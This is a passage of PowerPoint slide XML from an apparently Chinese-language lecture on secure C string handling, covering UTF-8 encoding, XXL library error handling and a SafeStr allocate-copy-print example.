                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的个数决定了其编码的位数，其余各字节均以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>开头。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>最多可用到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>个字节。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34601959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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>错误处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1981199"/>
            <a:ext cx="8140700" cy="4662488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>库来执行错误处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>提供了异常和资产管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>调用者负责处理异常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果没有指定异常处理程序，则默认情况下</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>输出消息到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>abort()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>依赖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可能会出现一个问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>因为两个库需要用来支持这个解决方案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14549622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zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SafeStr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1936576"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> str1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> str2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL_TRY_BEGIN {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  str1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(12, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  str2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("hello, world\n", 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(&amp;str1, str2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(str1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr_printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(str2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL_CATCH (SAFESTR_ERROR_OUT_OF_MEMORY)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>safestr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> out of memory.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL_EXCEPT {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("string operation failed.\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XXL_TRY_END;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409604" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1631776"/>
            <a:ext cx="3657600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73523"/>
              <a:gd name="adj2" fmla="val 297500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>为字符串分配内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409605" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="3612976"/>
            <a:ext cx="2819400" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69144"/>
              <a:gd name="adj2" fmla="val -55000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>复制字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409606" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
